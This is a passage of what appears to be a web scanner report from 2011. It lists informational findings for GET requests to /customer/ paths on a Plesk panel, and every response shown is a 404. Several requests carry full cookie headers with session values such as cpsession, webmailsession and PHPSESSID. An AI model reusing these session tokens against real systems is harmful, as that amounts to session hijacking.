Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:21 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.97. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/list-data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/list-data

Request

GET /customer/list-data HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:58 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.98. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/list/

Request

GET /customer/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:25 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.99. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/login-info/

Request

GET /customer/login-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.100. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login-info/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/login-info/id/

Request

GET /customer/login-info/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.101. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login-info/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/login-info/id/4

Request

GET /customer/login-info/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.102. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/login/

Request

GET /customer/login/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.103. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/login/id/

Request

GET /customer/login/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:12 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.104. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/login/id/4

Request

GET /customer/login/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.105. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/new-subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/new-subscription/

Request

GET /customer/new-subscription/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.106. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/new-subscription/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/new-subscription/id/

Request

GET /customer/new-subscription/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.107. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/new-subscription/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/new-subscription/id/4

Request

GET /customer/new-subscription/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; 